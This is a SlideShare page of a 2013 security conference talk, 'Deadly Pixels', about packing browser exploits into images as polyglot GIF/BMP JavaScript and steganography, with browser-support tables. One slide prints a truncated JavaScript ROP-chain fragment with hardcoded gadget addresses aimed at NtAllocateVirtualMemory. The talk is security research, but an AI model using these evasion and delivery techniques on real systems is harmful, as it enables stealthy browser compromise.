Deadly pixels - NSC 2013

4,201 views
4,028 views

Published on

My presentation at NoSuchCon 2013, Paris. What do you get if you combine art with an exploit? "Deadly Pixels" is the fine art (pun intended) of packaging exploits. The result is a pretty picture with not-so-pretty after effects.

Download PDF - http://www.nosuchcon.com/talks/D1_05_Saumil_Deadly_Pixels.pdf

Published in: Technology, Art & Photos
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
4,201
On SlideShare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
0
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Deadly pixels - NSC 2013

  1. 1. net-squareDeadly PixelsSaumil Shah, NoSuchCon 2013
  2. 2. net-squareSaumil Shah,presented by Deadly PixelsOne day,A mad meta-poet,With nothing to say,Wrote a mad meta-poemThat started "One day,A mad meta-poetWith nothing to say...
  3. 3. net-square#who am iCEONet-SquareReverseEngineeringExploitWritingPenetrationTestingOffensiveSecurityAttackDefenseConferenceSpeakerConferenceTrainerWeb 2.0 HTML5 XSS CSRFSQLi CORS XST clickjackingAJAX FLASH RIA SOAP WebServices UXSS XPATHi ....... <insert buzzwordyappsec jargon here>
  4. 4. net-squareYou either have an 0-day...
  5. 5. net-square...OR ITS HOW YOU USE IT
  6. 6. net-squareA successful exploit......is one that is delivered properly.
  7. 7. net-squareStealth Techniques TodayJSObfuscationBroken FileFormatsOLEEmbeddingJavascript/ActionscriptSpreadingthe payload
  8. 8. net-squareExploit SuccessFactorsIs itfresh?Is there apatch?Can it bedetected?
  9. 9. net-squarePutting together what I knowWebHackingBinaryExploits
  10. 10. net-squareSNEAKYLETHAL
  11. 11. net-squareHiding In Plain Sight
  12. 12. net-square
  13. 13. net-square
  14. 14. net-squareExploits as Grayscale Images•  Grayscale encoding (0-255).•  1 pixel = 1 character.•  Perfectly valid image.G r e e t i n g s P r o f e s s o r F a l k e n
  15. 15. net-squareIm an evil JavascriptIm an innocent image
  16. 16. net-squarefunction packv(n){var s=newNumber(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}varaddressof=newArray();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax_esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744;addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ecx_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addressof["call_peax"]=0x6d802597;functioncall_ntallocatevirtualmemory(baseptr,size,callnum){varropnop=packv(addressof["ropnop"]);varpop_eax_ret=packv(addressof["pop_eax_ret"]);varpop_ecx_ret=packv(addressof["pop_ecx_ret"]);varmov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);varmov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);varmov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);varcall_peax_ret=packv(addressof["call_peax_ret"]);varadd_esp_24_ret=packv(addressof["add_esp_24_ret"]);varpopad_ret=packv(addressof["popad_ret"]);var retval=""!<CANVAS>
  17. 17. net-squareSee no eval()
  18. 18. net-squareSame Same No Different!var a = eval(str);a = (new Function(str))();
  19. 19. net-squareIMAJSI iz a Javascript
  20. 20. net-squareIMAJS: Javascript, as an Image!
  21. 21. net-squareIMAJS-GIF Browser SupportHeight Width Browser/Viewer ImageRenders?JavascriptExecutes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE no yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Opera ? ?2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer no -2f 2a 00 00 Win 7 Preview yes -
  22. 22. net-squareIMAJS-BMP Browser SupportHeight Width Browser/Viewer ImageRenders?JavascriptExecutes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE yes yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Opera yes yes2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer yes -2f 2a 00 00 Win 7 Preview yes -
  23. 23. net-squareStegosploit!
  24. 24. net-squareDemoIMAJS stego FTW!
  25. 25. net-squareIMAJS "loader" scriptAlpha encoded exploit code
  26. 26. net-squareThe Near FutureHTML5CANVASHeap SprayWebGLCyber Cloud BYOD
  27. 27. net-squaresort of close”.@therealsaumilsaumil@net-square.comsort of close".Were the words that the mad poetFinally chose,To bring his mad poemTo some

×